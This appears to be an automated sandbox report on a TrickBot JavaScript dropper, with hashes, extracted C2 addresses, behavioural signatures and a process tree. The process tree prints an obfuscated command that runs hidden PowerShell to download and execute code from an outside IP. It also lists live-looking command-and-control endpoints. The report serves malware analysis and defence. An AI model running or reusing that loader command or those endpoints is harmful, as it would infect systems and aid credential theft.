Analysis
-
max time kernel
123s -
max time network
125s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
20-07-2021 19:03
Static task
static1
Behavioral task
behavioral1
Sample
4524.js
Resource
win7v20210410
General
-
Target
4524.js
-
Size
344KB
-
MD5
1e15caad81dbf43c24c3517c6658c138
-
SHA1
5a0e8e9cdc2a8b5a575c8f55674fa675ff49eef2
-
SHA256
185ac740c3516c3a6461b15d9b94047d6b48c0bd2184a03087890b573ace2884
-
SHA512
dd094e3e20987d6951da8e7069bff408b09293a6c67077a77d6721b801754a2cf4bee895b67bac4a65d0a0f49a57be180b059f4334d9ecd825497c6d07da00fd
Malware Config
Extracted
http://109.248.201.26/lovemetertok.php
Extracted
trickbot
100018
rob109
38.110.103.124:443
185.56.76.28:443
204.138.26.60:443
60.51.47.65:443
74.85.157.139:443
68.69.26.182:443
38.110.103.136:443
38.110.103.18:443
138.34.28.219:443
185.56.76.94:443
217.115.240.248:443
24.162.214.166:443
80.15.2.105:443
154.58.23.192:443
38.110.100.104:443
45.36.99.184:443
185.56.76.108:443
185.56.76.72:443
138.34.28.35:443
97.83.40.67:443
38.110.103.113:443
38.110.100.142:443
184.74.99.214:443
103.105.254.17:443
62.99.76.213:443
82.159.149.52:443
38.110.100.33:443
38.110.100.242:443
185.13.79.3:443
-
autorunName:pwgrabbName:pwgrabc
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 6 336 powershell.exe 7 336 powershell.exe -
Downloads MZ/PE file
-
Loads dropped DLL 1 IoCs
Processes:
rundll32.exepid process 616 rundll32.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 12 api.ipify.org -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 336 powershell.exe 336 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exewermgr.exedescription pid process Token: SeDebugPrivilege 336 powershell.exe Token: SeDebugPrivilege 1168 wermgr.exe -
Suspicious use of WriteProcessMemory 26 IoCs
Processes:
wscript.execmd.exepowershell.exerundll32.exerundll32.exedescription pid process target process PID 1240 wrote to memory of 1520 1240 wscript.exe cmd.exe PID 1240 wrote to memory of 1520 1240 wscript.exe cmd.exe PID 1240 wrote to memory of 1520 1240 wscript.exe cmd.exe PID 1520 wrote to memory of 336 1520 cmd.exe powershell.exe PID 1520 wrote to memory of 336 1520 cmd.exe powershell.exe PID 1520 wrote to memory of 336 1520 cmd.exe powershell.exe PID 336 wrote to memory of 588 336 powershell.exe rundll32.exe PID 336 wrote to memory of 588 336 powershell.exe rundll32.exe PID 336 wrote to memory of 588 336 powershell.exe rundll32.exe PID 588 wrote to memory of 616 588 rundll32.exe rundll32.exe PID 588 wrote to memory of 616 588 rundll32.exe rundll32.exe PID 588 wrote to memory of 616 588 rundll32.exe rundll32.exe PID 588 wrote to memory of 616 588 rundll32.exe rundll32.exe PID 588 wrote to memory of 616 588 rundll32.exe rundll32.exe PID 588 wrote to memory of 616 588 rundll32.exe rundll32.exe PID 588 wrote to memory of 616 588 rundll32.exe rundll32.exe PID 616 wrote to memory of 304 616 rundll32.exe cmd.exe PID 616 wrote to memory of 304 616 rundll32.exe cmd.exe PID 616 wrote to memory of 304 616 rundll32.exe cmd.exe PID 616 wrote to memory of 304 616 rundll32.exe cmd.exe PID 616 wrote to memory of 1168 616 rundll32.exe wermgr.exe PID 616 wrote to memory of 1168 616 rundll32.exe wermgr.exe PID 616 wrote to memory of 1168 616 rundll32.exe wermgr.exe PID 616 wrote to memory of 1168 616 rundll32.exe wermgr.exe PID 616 wrote to memory of 1168 616 rundll32.exe wermgr.exe PID 616 wrote to memory of 1168 616 rundll32.exe wermgr.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\4524.js1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQAwADkALgAyADQAOAAuADIAMAAxAC4AMgA2AC8AbABvAHYAZQBtAGUAdABlAHIAdABvAGsALgBwAGgAcAAiACkA2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQAwADkALgAyADQAOAAuADIAMAAxAC4AMgA2AC8AbABvAHYAZQBtAGUAdABlAHIAdABvAGsALgBwAGgAcAAiACkA3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\iSePCFQ.bin StartW4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\iSePCFQ.bin StartW5⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe6⤵
-
C:\Windows\system32\wermgr.exeC:\Windows\system32\wermgr.exe6⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\iSePCFQ.binMD5
c081de0c60b825636e0eda6debce444e
SHA1a52284367553b80721088831bf6d7c128b2138df
SHA256401e52fb29e17537735f4a4a53058c091957379b9e0d79855936dfbb62d12dcd
SHA512876726a135ce5c5fa7dd1faa152ff737b0225f5f7c0ed17c70cb1b96a68074c4912eb49849c39bd8e3ee28e66fe746ced0398c2295b26db1f486882caca01a65
-
\Users\Admin\AppData\Local\Temp\iSePCFQ.binMD5
c081de0c60b825636e0eda6debce444e
SHA1a52284367553b80721088831bf6d7c128b2138df
SHA256401e52fb29e17537735f4a4a53058c091957379b9e0d79855936dfbb62d12dcd
SHA512876726a135ce5c5fa7dd1faa152ff737b0225f5f7c0ed17c70cb1b96a68074c4912eb49849c39bd8e3ee28e66fe746ced0398c2295b26db1f486882caca01a65
-
memory/336-60-0x0000000000000000-mapping.dmp
-
memory/336-61-0x000007FEFB591000-0x000007FEFB593000-memory.dmpFilesize
8KB
-
memory/336-62-0x0000000001F90000-0x0000000001F91000-memory.dmpFilesize
4KB
-
memory/336-63-0x000000001ADD0000-0x000000001ADD1000-memory.dmpFilesize
4KB
-
memory/336-64-0x0000000002060000-0x0000000002061000-memory.dmpFilesize
4KB
-
memory/336-65-0x000000001AD50000-0x000000001AD52000-memory.dmpFilesize
8KB
-
memory/336-66-0x000000001AD54000-0x000000001AD56000-memory.dmpFilesize
8KB
-
memory/336-67-0x0000000002090000-0x0000000002091000-memory.dmpFilesize
4KB
-
memory/336-68-0x000000001B890000-0x000000001B891000-memory.dmpFilesize
4KB
-
memory/588-69-0x0000000000000000-mapping.dmp
-
memory/616-71-0x0000000000000000-mapping.dmp
-
memory/616-72-0x00000000752B1000-0x00000000752B3000-memory.dmpFilesize
8KB
-
memory/616-74-0x0000000000310000-0x000000000034B000-memory.dmpFilesize
236KB
-
memory/616-77-0x0000000000350000-0x0000000000389000-memory.dmpFilesize
228KB
-
memory/616-79-0x00000000003A0000-0x00000000003D7000-memory.dmpFilesize
220KB
-
memory/616-82-0x0000000000500000-0x0000000000544000-memory.dmpFilesize
272KB
-
memory/616-81-0x0000000000140000-0x0000000000178000-memory.dmpFilesize
224KB
-
memory/616-83-0x00000000006B0000-0x00000000006C1000-memory.dmpFilesize
68KB
-
memory/616-84-0x00000000001F1000-0x00000000001F3000-memory.dmpFilesize
8KB
-
memory/1168-85-0x0000000000000000-mapping.dmp
-
memory/1168-86-0x00000000000E0000-0x0000000000108000-memory.dmpFilesize
160KB
-
memory/1168-87-0x0000000000190000-0x0000000000191000-memory.dmpFilesize
4KB
-
memory/1520-59-0x0000000000000000-mapping.dmp